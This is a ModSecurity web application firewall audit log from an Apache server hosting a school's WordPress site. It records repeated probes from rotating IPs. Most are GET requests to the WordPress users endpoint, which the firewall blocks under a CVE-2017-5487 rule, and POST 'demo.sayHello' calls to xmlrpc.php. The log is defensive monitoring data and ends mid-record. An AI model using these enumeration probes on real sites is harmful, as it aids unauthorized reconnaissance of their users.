Action: Intercepted (phase 2) Stopwatch: 1747499523985806 2595 (- - -) Stopwatch2: 1747499523985806 2595; combined=1229, p1=433, p2=768, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --242ec754-Z-- --e41c2f67-A-- [17/May/2025:23:32:17 +0700] aCi6ERKi5m5upc8uMd5TlgAAAMk 103.236.140.4 41924 103.236.140.4 8181 --e41c2f67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e41c2f67-C-- demo.sayHello --e41c2f67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e41c2f67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499537496857 6521 (- - -) Stopwatch2: 1747499537496857 6521; combined=4748, p1=635, p2=3870, p3=39, p4=43, p5=97, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e41c2f67-Z-- --a0531c75-A-- [17/May/2025:23:33:55 +0700] aCi6c3yxdQCiyU1ENFfY5wAAABQ 103.236.140.4 48894 103.236.140.4 8181 --a0531c75-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a0531c75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0531c75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499635847685 2188 (- - -) Stopwatch2: 1747499635847685 2188; combined=930, p1=356, p2=555, p3=0, p4=0, p5=19, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0531c75-Z-- --befa856f-A-- [17/May/2025:23:34:03 +0700] aCi6ewTOsBn9MSWb6WIMsAAAAJM 103.236.140.4 49410 103.236.140.4 8181 --befa856f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --befa856f-C-- demo.sayHello --befa856f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --befa856f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499643098869 4296 (- - -) Stopwatch2: 1747499643098869 4296; combined=3240, p1=514, p2=2553, p3=27, p4=29, p5=69, sr=54, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --befa856f-Z-- --0fe6ba0d-A-- [17/May/2025:23:34:52 +0700] aCi6rATOsBn9MSWb6WIN6AAAAI4 103.236.140.4 52970 103.236.140.4 8181 --0fe6ba0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fe6ba0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe6ba0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499692032007 7088 (- - -) Stopwatch2: 1747499692032007 7088; combined=5311, p1=497, p2=4744, p3=0, p4=0, p5=68, sr=80, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe6ba0d-Z-- --4d43283b-A-- [17/May/2025:23:35:00 +0700] aCi6tOm4kjNN-hEbWjLdVAAAAFg 103.236.140.4 53584 103.236.140.4 8181 --4d43283b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d43283b-C-- demo.sayHello --4d43283b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d43283b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499700479973 6203 (- - -) Stopwatch2: 1747499700479973 6203; combined=4714, p1=691, p2=3777, p3=42, p4=54, p5=88, sr=62, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d43283b-Z-- --bc819f60-A-- [17/May/2025:23:35:28 +0700] aCi60ATOsBn9MSWb6WIO_AAAAI0 103.236.140.4 55502 103.236.140.4 8181 --bc819f60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bc819f60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc819f60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499728118888 2620 (- - -) Stopwatch2: 1747499728118888 2620; combined=1497, p1=488, p2=975, p3=0, p4=0, p5=34, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc819f60-Z-- --5e60943b-A-- [17/May/2025:23:35:35 +0700] aCi61-m4kjNN-hEbWjLeNgAAAE0 103.236.140.4 56042 103.236.140.4 8181 --5e60943b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.133 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5e60943b-C-- demo.sayHello --5e60943b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e60943b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499735312031 5867 (- - -) Stopwatch2: 1747499735312031 5867; combined=4183, p1=562, p2=3336, p3=36, p4=38, p5=120, sr=68, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e60943b-Z-- --e9e0d60c-A-- [17/May/2025:23:36:35 +0700] aCi7E3yxdQCiyU1ENFfcIAAAABg 103.236.140.4 60302 103.236.140.4 8181 --e9e0d60c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9e0d60c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9e0d60c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499795521034 2041 (- - -) Stopwatch2: 1747499795521034 2041; combined=1066, p1=382, p2=659, p3=0, p4=0, p5=24, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9e0d60c-Z-- --87384257-A-- [17/May/2025:23:36:43 +0700] aCi7GwTOsBn9MSWb6WIRpwAAAJU 103.236.140.4 60884 103.236.140.4 8181 --87384257-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87384257-C-- demo.sayHello --87384257-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87384257-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499803827915 4775 (- - -) Stopwatch2: 1747499803827915 4775; combined=3382, p1=461, p2=2736, p3=26, p4=28, p5=78, sr=53, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87384257-Z-- --1c87892b-A-- [17/May/2025:23:39:23 +0700] aCi7u-m4kjNN-hEbWjLj8gAAAFA 103.236.140.4 43788 103.236.140.4 8181 --1c87892b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c87892b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c87892b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499963143531 2363 (- - -) Stopwatch2: 1747499963143531 2363; combined=1052, p1=353, p2=673, p3=0, p4=0, p5=25, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c87892b-Z-- --d5236455-A-- [17/May/2025:23:39:30 +0700] aCi7wnyxdQCiyU1ENFfg1gAAABc 103.236.140.4 44334 103.236.140.4 8181 --d5236455-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d5236455-C-- demo.sayHello --d5236455-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5236455-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499970953961 6620 (- - -) Stopwatch2: 1747499970953961 6620; combined=5298, p1=732, p2=4193, p3=57, p4=59, p5=143, sr=66, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5236455-Z-- --0838cf7d-A-- [17/May/2025:23:39:35 +0700] aCi7xxKi5m5upc8uMd5fFQAAAMQ 103.236.140.4 44596 103.236.140.4 8181 --0838cf7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0838cf7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0838cf7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499975074538 2556 (- - -) Stopwatch2: 1747499975074538 2556; combined=1145, p1=410, p2=706, p3=0, p4=0, p5=29, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0838cf7d-Z-- --9659c633-A-- [17/May/2025:23:39:46 +0700] aCi70hKi5m5upc8uMd5fTQAAANc 103.236.140.4 45336 103.236.140.4 8181 --9659c633-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9659c633-C-- demo.sayHello --9659c633-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9659c633-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499986323857 5005 (- - -) Stopwatch2: 1747499986323857 5005; combined=3553, p1=528, p2=2812, p3=26, p4=28, p5=90, sr=86, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9659c633-Z-- --2ac0e430-A-- [17/May/2025:23:40:06 +0700] aCi75hKi5m5upc8uMd5fzQAAAMk 103.236.140.4 46740 103.236.140.4 8181 --2ac0e430-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ac0e430-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ac0e430-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500006425241 2099 (- - -) Stopwatch2: 1747500006425241 2099; combined=855, p1=300, p2=534, p3=0, p4=0, p5=21, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ac0e430-Z-- --7f4fd730-A-- [17/May/2025:23:40:12 +0700] aCi77Om4kjNN-hEbWjLlKAAAAE0 103.236.140.4 47188 103.236.140.4 8181 --7f4fd730-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f4fd730-C-- demo.sayHello --7f4fd730-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f4fd730-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500012793063 5262 (- - -) Stopwatch2: 1747500012793063 5262; combined=3959, p1=610, p2=3140, p3=30, p4=33, p5=87, sr=76, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f4fd730-Z-- --7516ab68-A-- [17/May/2025:23:41:00 +0700] aCi8HATOsBn9MSWb6WIZZAAAAJQ 103.236.140.4 50492 103.236.140.4 8181 --7516ab68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7516ab68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7516ab68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500060254507 2217 (- - -) Stopwatch2: 1747500060254507 2217; combined=940, p1=317, p2=601, p3=0, p4=0, p5=21, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7516ab68-Z-- --1ca93571-A-- [17/May/2025:23:41:05 +0700] aCi8IQTOsBn9MSWb6WIZkwAAAIE 103.236.140.4 50844 103.236.140.4 8181 --1ca93571-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1ca93571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ca93571-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 